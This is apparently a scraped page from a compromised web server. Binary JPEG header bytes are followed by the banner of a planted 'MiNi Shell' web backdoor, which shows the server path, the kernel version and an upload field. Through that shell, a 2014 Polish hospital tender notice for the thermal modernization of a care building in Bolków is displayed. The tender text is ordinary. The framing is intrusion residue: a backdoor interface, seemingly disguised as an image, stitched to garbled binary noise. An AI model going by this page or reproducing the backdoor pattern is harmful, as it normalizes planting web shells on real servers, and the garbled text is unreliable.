JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140408/75615-N-2014.html

<p class="kh_header"><b>Jelenia Góra: Termomodernizacja budynku 
Zakładu Opiekuńczo-Leczniczego w Bolkowie</b><br>
<b>Numer ogłoszenia: 75615 - 2014; data zamieszczenia: 08.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej , ul. Ogińskiego 6, 58-506 Jelenia Góra, woj. dolnośląskie, tel. 75 7537286, faks 75 7543883.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.jgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku 
Zakładu Opiekuńczo-Leczniczego w Bolkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Termomodernizacja dotyczy czynnego całodobowo obiektu Zakładu Opiekuńczo-Leczniczego w Bolkowie.Przedmiotem  zamówienia jest zaprojektowanie i wykonanie termomodernizacji budynku , to jest: sporządzenie projektu budowlanego,  uzyskanie pozwolenia na budowę,
 sporządzenie projektów wykonawczych, specyfikacji technicznych wykonania             i odbioru robót budowlanych, wykonanie robót budowlanych na podstawie sporządzonej Dokumentacji Projektowej,      
osiągnięcie efektu energetycznego polegającego na: zmniejszeniu  rocznego zapotrzebowania na ciepło do ogrzewania budynku  bez uwzględniania sprawności systemu ogrzewania i przerw w ogrzewaniu do poziomu nie większego niż 646 GJ_rok,  zmniejszeniu rocznego zapotrzebowania na ciepło do ogrzewania budynku      z uwzględnieniem sprawności systemu ogrzewania i przerw w ogrzewaniu do poziomu nie większego niż 762 GJ_rok, zmniejszeniu rocznego zapotrzebowania na ciepło do przygotowania  ciepłej wody użytkowej do poziomu nie większego niż 332 GJ_rok.
  Przedmiot zamówienia obejmuje:                                                                                                sporządzenie kompletnej Dokumentacji Projektowej  łącznie   z uzyskaniem mapy do celów projektowych , opracowaniem inwentaryzacji na potrzeby sporządzenia Dokumentacji Projektowej oraz uzyskanie wszelkich wymaganych przepisami szczególnymi uzgodnień, opinii właściwych organów oraz pozwoleń,  jak również wszelkich innych ekspertyz   i opracowań, których potrzeba ujawni się w trakcie prac projektowych i realizacji.W Dokumentacji Projektowej - wyłącznie w Projekcie budowlanym,  należy uwzględnić,    w formie  szkicowej,  kompleksową  przebudowę  wewnętrznej instalacji kanalizacyjnej, przy czym samo wykonanie wewnętrznej  instalacji kanalizacyjnej nie jest objęte przedmiotem zamówienia, z wyjątkiem  wykonanie 3 niezależnych pionów instalacji kanalizacyjnej poprowadzonych od poziomu piwnicy do poziomu poddasza użytkowego wraz z przebudową instalacji kanalizacyjnej odprowadzającej ścieki z wymienianych umywalek ;  opracowanie planu bezpieczeństwa i ochrony zdrowia   oraz  planu  bezpieczeństwa ,   Projektu Organizacji Robót.  Przy sporządzaniu Projektu Organizacji Robót należy uwzględnić warunek Zamawiającego:  w pierwszej kolejności- należy rozpocząć prace od wymiany instalacji   wewnętrznych  w budynku, o której mowa w następnych  punktach, począwszy od parteru poprzez piętra do poddasza. Transport materiałów począwszy od piętra musi odbywać się wyłącznie od zewnętrznej strony budynku, co oznacza dostępność do poszczególnych kondygnacji wyłącznie od strony zewnętrznej budynku, z wyłączeniem parteru. Obiekt nie posiada zewnętrznych ciągów komunikacyjnych na  poszczególne kondygnacje.   Ze względu na to, że obiekt na czas przebudowy nie może być wyłączony    z użytkowania- Wykonawcy będzie udostępniana kolejna kondygnacja, po oddaniu do użytkowania kondygnacji poprzedniej. 
Równolegle z pracami instalacyjnymi wewnątrz budynku muszą trwać prace 
       związane z przebudową pomieszczeń kotłowni. Czas trwania robót budowlanych wewnątrz budynku - do 77 dni, liczony od daty podpisania protokołu przekazania Wykonawcy terenu budowy, zgodnie z Harmonogramem rzeczowo-finansowymPonieważ roboty związane z wymianą instalacji wewnętrznej nie wymagają uzyskania pozwolenia na budowę, Zamawiający dopuszcza możliwość 
wykonania ich na Zgłoszenie zamiaru przystąpienia do robót budowlanych, po wykonaniu  i zatwierdzeniu przez Zamawiającego Projektu - w wersji roboczej. Uzgodniona wersja robocza Projektu docelowo musi być  ujęta              w Dokumentacji Projektowej. W drugiej kolejności i następnych - wszystkie roboty budowlane  prowadzone po zewnętrznej stronie budynku, ściśle wg Projektu Organizacji Robót uwzględniającego zapisy Harmonogramu rzeczowo-finansowego stanowiącego integralny załącznik Oferty.   Realizację robót budowlanych zgodnie z opracowaną i uzgodnioną z Zamawiającym,              
w zakresie przyjętych rozwiązań Dokumentacją Projektową oraz uzyskaną ostateczną decyzją o pozwoleniu na budowę, z możliwością rozpoczęcia robót wew. instalacji        w oparciu o  Zgłoszenie zamiaru przystapienia do robót;    sporządzenie Dokumentacji Powykonawczej;     uczestnictwo w  wszelkich czynnościach odbiorowych  przedmiotu zamówienia;  przygotowanie dokumentacji niezbędnej do uzyskania pozwolenia na użytkowanie,        w imieniu Zamawiającego złożenie kompletnego wniosku  o wydanie pozwolenia na użytkowanie, udział podczas kontroli PINB , uzyskanie pozwolenia na użytkowanie- jeśli uzyskanie pozwolenia na użytkowanie wymagane będzie zapisami w decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę; rozruch i uruchomienie urządzeń powstałych w wyniku realizacji przedmiotu  zamówienia;   usuwanie wad w ramach rękojmi za wady fizyczne i gwarancji  jakości  w odniesieniu                   do przedmiotu zamówienia;  uczestnictwo, na wezwanie Zamawiającego, w przeglądach gwarancyjnych,  w ramach            wynagrodzenia ryczałtowego; zapewnienie i prowadzenie obsługi geodezyjnej budowy; zapewnienie nadzoru autorskiego w ramach wynagrodzenia ryczałtowego za wykonanie
     przeniesienie praw autorskich i innych praw związanych z przygotowaną Dokumentacją. Wymagania Zamawiającego w stosunku do wykonania przedmiotu zamówienia: przygotowanie terenu budowy,  zastosowanie materiałów i urządzeń posiadających świadectwa dopuszczenia do stosowania w budownictwie, wymagane prawem atesty i aprobaty, dokumentację techniczno-ruchową w języku polskim, a w przypadku ich braku - instrukcje, spełniające wymogi szczegółowych norm i przepisów z zakresu BHP, sanitarnych     i przeciw pożarowych oraz określony w Programie Funkcjonalno-Użytkowym          (PF-U) standard jakościowy; zastosowanie kolektorów słonecznych  na połaci dachowej, o parametrach funkcjonalnych i wydajnościowych nie  gorszych niż określone w PF-U, z wyłączeniem sprawności optycznej oraz współczynnika strat ciepła Po zdaniu _Certyfikat SolarKeymark _ dodaje się  _ lub sprawozdanie z badań oraz Certyfikat Jakościowy wydany przez niezależną jednostkę akredytowaną_. Wykonanie rur dobiegowych  od kolektorów słonecznych do pomieszczeń kotłowni, w której usytuowany będzie pojemnościowy podgrzewacz c.w.uż.  Rury dobiegowe miedziane w izolacji termicznej prowadzone po wierzchu ( pod stropami lub po ścianach;  zastosowanie  do produkcji c.w.uż. pojemnościowego podgrzewacza wody  o pojem.                    co najmniej 1000 dm3  zasilanego przez pompę obiegową. 
                  Wykonanie wewnętrznej instalacji  przygotowania ciepłej wody użytkowej   wraz           z cyrkulacją , z rur i kształtek miedzianych w izolacji  termicznej , dla której  źródłem ciepła będzie kocioł i/lub instalacja solarna. Instalacja wykonana z obiegiem cyrkulacyjnym wraz z pompą cyrkulacyjną wyposażoną w sterownik-programator oraz  w wodomierz do ciepłej wody.  
 Wymianę  instalacji   wewnętrznej ciepłej wody użytkowej  i wody zimnej.           Przy wymianie starej instalacji należy wykonać  3 niezależne piony poprowadzone od poziomu piwnicy do poziomu poddasza użytkowego.  Wymianą instalacji należy objąć cały blok żywienia zlokalizowany w części podpiwniczonej   oraz wszystkie pomieszczenia w budynku, z wyłączeniem ciągów komunikacyjnych, nalezy uwzględnić  konieczność  wymiany umywalek  w 12 pomieszczeniach na umywalki ceramiczne wsparte na postumentach   Wszystkie podejścia do przyborów muszą być  zakończone zaworami odcinającymi.  Wszystkie baterie powinny być wymienione na baterie oszczędne- z ograniczeniem czasu wypływu wody. Zastosowany materiał: rury PP; przyjęcie pompy obiegowej układu solarnego zapewniającej przepływ i wysokość podnoszenia wynikający z opracowanej Dokumentacji Projektowej;   wykonanie instalacji automatyki i sterowania pracą instalacji solarnej;  wymiana instalacji wewnętrznej centralnego ogrzewania na instalację ogrzewania wodnego, niskotemperaturowego, wykonaną z rur miedzianych, z zastosowaniem stalowych grzejników płytowych- higienicznych wyposażonych w  zawory termostatyczne wraz z zabudową kondensacyjnych kotłów gazowych pracujących    w systemie kaskadowym- 125kW z możliwością odchyłki +20%; zmodernizowanie istniejącej kotłowni w zakresie: 
 pomieszczenia dla potrzeb instalacji nowych urządzeń tj. wykonania fundamentów pod urządzenia, przebić, przejść szczelnych przez przegrody budowlane, bruzd, otworów montażowych, podpór, zawiesi, etc. wraz         z przywróceniem naruszanych miejsc do stanu pierwotnego i pomalowaniem;   instalacji elektrycznej  na odcinku od tablicy głównej do rozdzielni                  w pomieszczeniu kotłowni wraz z wykonaniem nowej rozdzielni dla instalacji c.o. i solarnej; prowadzenie wszystkich rur  instalacji wewnętrznej w nowej izolacji termicznej po  wierzchu,     w zabudowie z płyt gipsowo- kartonowych. Zabudową  nie jest objęta  instalacja w pomieszczeniach kotłowni. Wykonanie instalacji automatyki i sterowania pracą instalacji solarnej;    wykonanie od wewnątrz ocieplenia połaci dachowej hydrofobizowaną wełną mineralną, zabezpieczoną folią paroizolacyjną i płytą gipsowo-kartonową ogniochronną dla uzyskania wymaganej przepisami klasy  odporności ogniowej oraz od zewnątrz, po zdjęciu  dotychczasowego pokrycia z blachy, wykonanie nowego pokrycia dachowego z gontu bitumicznego w kolorze czerwonym. Pokrycie należy wykonać jako dwuwarstwowe, na podłożu drewnianym, z zastosowaniem systemowych kominków wentylacyjnych. Należy założyć wymianę deskowania na ok. 10% powierzchni połaci dachowej. Obróbki blacharskie ( w tym: rynny dachowe) blacha tytan-cynk, rury spustowe do poziomu stropu I kondygnacji  - tytan.cynk, poniżej - PCV, rozbijacze śniegu  na połaci dachowej;  wykonanie ocieplenia ścian zewnętrznych styropianem  fasadowym w technologii bezspoinowego systemu ocieplenia; tynk  barwiony w masie, faktura _kamyczek 1,5mm_,  kolorystyka w trzech wariantach - w fazie roboczej do uzgodnienia  z Zamawiającym;  wymiana stolarki okiennej na PVC wraz z parapetami (wewnętrzne)  i drzwiowej (zewnętrzne) na profile aluminiowe ciepłe z samozamykaczami.  W przypadku parapetów należy zastosować materiał o powierzchni gładkiej  i zmywalnej odporny na dezynfekcje środkami chemicznymi;
  Ze względów użytkowych przy drzwiach głównych - na całej szerokości klatki schodowej i przy drzwiach bocznych - na całej szerokości korytarza należy wykonać wiatrołap. Podział istniejących okien i wymiary stolarki pozostają bez zmian.   Na poddaszu należy zamontować okna połaciowe, likwidując dotychczasowe.    Wykonanie izolacji pionowej ścian zewnętrznych budynku poniżej poziomu gruntu  (ściany piwnic), odwodnienie w wykopie podczas wykonywania izolacji pionowej, wykonanie opaski  drenarskiej wraz z studniami drenarskimi i odprowadzeniem wód do sieci zewnętrznej;  wykonanie odtworzenia terenu po robotach ziemnych oraz odtworzenie miejsc po przejściach instalacyjnych przez ściany oraz stropy, uzupełnienie (wypełnienie) bruzd, przemalowanie pomieszczeń, w których prowadzone były roboty instalacyjne. Szacunkowo roboty malarskie są do wykonania na 95% wszystkich powierzchni do malowania. Szczegółowe minimalne wymagania dotyczące sposobu wykonania przedmiotu zamówienia, w tym szczególnie parametry techniczne  dla materiałów i urządzeń zostały ujęty  w Programie Funkcjonalno-Użytkowym.                  Na wykonany przedmiot zamówienia wykonawca jest zobowiązany udzielić Gwarancji
 jakości co najmniej na 60 miesięcy, począwszy od dnia następującego po dacie wystawienia pozwolenia na użytkowanie, z wyłączeniem kolektorów słonecznych, dla których Okres Gwarancyjny kończy się po upływie 10 lat od tego dnia- jeśli uzyskanie pozwolenia na użytkowanie wymagane będzie zapisami w decyzji zatwierdzającej projekt budowlany    i udzielającej pozwolenia na budowę . 
W przeciwnym razie -okres ten liczony jest od dnia podpisania Protokołu Odbioru Końcowego i kończący się po upływie 60 miesięcy od dnia jego podpisania,  z wyłączeniem kolektorów słonecznych, dla których Okres Gwarancyjny kończy się po upływie 10 lat od dnia podpisania  Odbioru Końcowego.
W  okresie gwarancji jakości Wykonawca jest zobowiązany do świadczenia bezpłatnych przeglądów i bezpłatnych usług serwisowych (z wyłączeniem materiałów eksploatacyjnych), przy czym bezpłatne usługi serwisowe dla kolektorów słonecznych wykonywane będą przez okres 5 lat licząc od daty wystawienia pozwolenia na użytkowanie.
 Wykonawca    udziela    Zamawiającemu    rękojmi    na    cały    przedmiot    Umowy    na okres   równy okresowi gwarancji jakości.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.00-8, 71.22.10.00-3, 71.32.20.00-1, 45.26.00.00-7, 45.33.10.00-6, 45.31.00.00-3, 45.32.00.00-6, 45.42.00.00-7, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości:  
15 000,00  zł (słownie złotych: piętnaście tysięcy).
  Wadium musi być wniesione w formie zgodnej z art. 45 ust. 6 Ustawy, tj. 
               pieniądzu ;  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej  z  tym,  że poręczenie kasy jest zawsze 
                            poręczeniem pieniężnym;gwarancjach bankowych;  gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości   (tekst jednolity z 2007 r.  Dz. U. Nr 42, poz. 275, z późniejszymi zmianami). Wadium musi być wniesione przed upływem terminu składania ofert. Zamawiający przyjmuje, iż wadium w formie pieniężnej zostanie wniesione z chwilą uznania rachunku
               bankowego Zamawiającego.  Wadium wnoszone w dopuszczonej przez Zamawiającego formie innej, niż  _pieniądz_,  Wykonawca wnosi do Zamawiającego  przy czym, w takim przypadku za termin doręczenia uważa się datę jego zdeponowania w sekretariacie WCSzKJ, budynek D, parter- strona prawa, segment administracja, pokój 171.   Wadium  w dopuszczonej  przez Zamawiającego formie innej, niż _pieniądz_, Wykonawca  może dołączyć do oferty - pod warunkiem, że umieszczone zostanie w osobnej kopercie opisanej: nazwa i adres wykonawcy, adnotacja: Wadium - termomodernizacja- Bolków,   w sposób  umożliwiający Zamawiającemu   zdeponowanie  wadium - bez konieczności  naruszenia koperty, w której znajduje się oferta.

 W przypadku wnoszenia przez Wykonawcę wadium w formie gwarancji lub poręczeń muszą
      one być co najmniej bezwarunkowe, nieodwołalne, nie podlegające przeniesieniu na osoby
      trzecie i płatne na pierwsze pisemne żądanie Zamawiającego.  Gwarancje i poręczenia muszą zawierać (oprócz elementów właściwych dla każdej z nich,             określonych przepisami prawa, w tym szczególnie oświadczenie  o odpowiedzialności za wszystkie przypadki powodujące utratę wadium przez wykonawcę):
 nazwę i adres Zamawiającego;   nazwa postępowania; termin ważności wadium - odpowiadający terminowi związania ofertą. 
Wadium wnoszone w pieniądzu należy przelać (tj. dokonać wyłącznie przelewem  na konto Zamawiającego) na następujący rachunek Zamawiającego prowadzony w banku PKO Bank Polski S.A. nr 23 1020 2137 0000 9702 0129 1483, z dopiskiem Wadium -termomodernizacja- Bolków. Wskazane jest, aby kopia polecenia przelewu na konto Zamawiającego potwierdzona za zgodność z oryginałem przez Wykonawcę została dołączona do oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia wykazu  wykonanych robót budowlanych   w okresie ostatnich 5 lat przed upływem terminu  składania ofert ,   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz                z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie     z zasadami sztuki budowlanej i prawidłowo ukończone. 
                                 Decyzja, które roboty budowlane widniejące w ww. wykazie są najważniejsze, pozostawiona jest Wykonawcy, z zastrzeżeniem treści zdania następnego.

  Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie i wykazane w ww. Wykazie realizacje: 
                                6.1.1.1   z których co najmniej dwie(2) dotyczą zaprojektowania i wykonania                
                                              robót budowlanych, w zakresie których było między innymi wykonanie
             systemów solarnych kolektorów słonecznych na bazie płaskich 


             kolektorów słonecznych wspartych na konstrukcji stalowej 
             z wykonaniem instalacji automatyki i sterowania  pracą instalacji solarnej
                                6.1.1.2   z których co najmniej dwie(2) dotyczą zaprojektowania i wykonania                
                                            robót budowlanych, w zakresie których było wykonanie lub wymiana wew.  instalacji c.o., c.w.uż. w obiekcie co najmniej dwukondygnacyjnym
                                  6.1.1.3 z których co najmniej dwie(2) dotyczą zaprojektowania i wykonania robót budowlanych, w zakresie których była termomodernizacja budynku               
                           z zakresem ocieplenia przegród zewnętrznych, wymianie stolarki  budowlanej, wykonaniu elewacji.
                         Zakres rzeczowy realizacji może stanowić dowolne połączenie wymaganych zakresów rzeczowych, o których mowa w punkcie od 6.1.1.1 do 6.1.1.3.
                          Ważne jest, żeby dla każdego zakresu rzeczowego wymienionego  w punkcie od
                          6.1.1.1 do 6.1.1.3. Wykonawca wykazał się co najmniej dwoma realizacjami        
                          w wymaganym zakresie, jednak w ogólnej liczbie realizacji nie większej niż  
 
Każda z realizacji musi być poparta załączonymi dowodami potwierdzającymi, 
 o których mowa w punkcie 6.1.1, przy czym dowody te muszą   być wydane przez podmiot na  rzecz, którego te roboty budowlane zostały wykonane.     
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w ww. wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów- poświadczeń, o których mowa wyżej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego  zamówienia w szczególności osoby: 
                  6.1.2.1  projektanta który posiada:
            (a) uprawnienia do projektowania w specjalności architektonicznej bez  ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które  zostały wydane na podstawie wcześniej obowiązujących przepisów;
                            6.1.2.2  projektanta, który posiada:
          (a) uprawnienia budowlane do projektowania  w specjalności  konstrukcyjno-budowlanej bez ograniczeń do projektowania lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
          (b) co najmniej 36-miesięczne doświadczenie w projektowaniu   w zakresie posiadanych uprawnień; 
                  6.1.2.3  projektanta, który posiada:
          (a) uprawnienia budowlane do projektowania  w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do projektowania lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 



          (b) co najmniej 36miesięczne doświadczenie w projektowaniu  w zakresie posiadanych uprawnień, uczestniczył w projektowaniu co najmniej jednej instalacji kolektorów słonecznych z pracami towarzyszącymi, wykonaniem w obiektach służby zdrowia wewnętrznej instalacji c.o. i c.w.uż. 
                           6.1.2.4 projektanta, który posiada:  
        (a)  uprawnienia budowlane do projektowania  w specjalności  instalacyjnej  w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  do projektowania lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej  obowiązujących przepisów przy czym nie są wymagane w zakresie sieci;
            (b)  co najmniej 24miesięczne doświadczenie w projektowaniu w zakresie
                 posiadanych uprawnień;         
                           6.1.2.5  projektanta - inżyniera ds. AKPiA, który posiada:       
                                  (a)  wykształcenie wyższe techniczne w specjalności automatyka lub
                                         automatyka i pomiary lub elektronika lub elektryczne oraz  
                                         doświadczenie zawodowe w projektowaniu instalacji automatyki                      i sterowania  pracą instalacji solarnej; 
                             6.1.2.6   kierownika budowy, który posiada:
                                 (a) uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
                                 (b)    co najmniej 60-miesięczne doświadczenia zawodowego na stanowisku kierownika budowy w zakresie posiadanych uprawnień;
                   6.1.2.7   kierownika robót lub majstra, który posiada:
          (a) uprawnienia budowlane do kierowania robotami w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do projektowania lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów; 
                                  (b)  co najmniej 60-miesięczne doświadczenie zawodowego na stanowisku kierownika budowy i/lub kierownika robót i/lub majstra robót,               w zakresie posiadanych uprawnień;
                   6.1.2.8   kierownika robót lub majstra, który posiada:
       (a) uprawnienia budowlane do kierowania robotami w specjalności  instalacyjnej  w zakresie  sieci, instalacji i urządzeń elektrycznych                i elektroenergetycznych bez ograniczeń do projektowania lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej  obowiązujących przepisów przy czym nie są wymagane w zakresie sieci;
         (b)  posiada co najmniej 24-miesięczne doświadczenie na stanowisku kierownika budowy  i/lub kierownika robót i/lub majstra robót,               w zakresie posiadanych uprawnień;      

                          6.1.2.9   inżyniera ds. AKPiA, który posiada:       
                                  (a) wykształcenie wyższe techniczne w specjalności automatyka lub automatyka i pomiary lub elektronika lub elektryczne oraz doświadczenie zawodowe w uruchamianiu i programowaniu  instalacji automatyki  i sterowania  pracą instalacji solarnej. 
                          
Zamawiający dopuszcza posiadanie uprawnień w ww. branżach przez jedną, dwie lub trzy osoby pod warunkiem, że zostaną odpowiednio wskazane do pełnienia funkcji zgodnie z  zakresem odpowiadającym ich uprawnieniom.
                            Przez wymagany  minimalny okres  doświadczenia zawodowego należy   rozumieć łączną ilość miesięcy przepracowanych  odpowiednio na stanowisku projektanta lub kierownika budowy, w okresie od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia  o zamówieniu w Biuletynie Zamówień Publicznych.
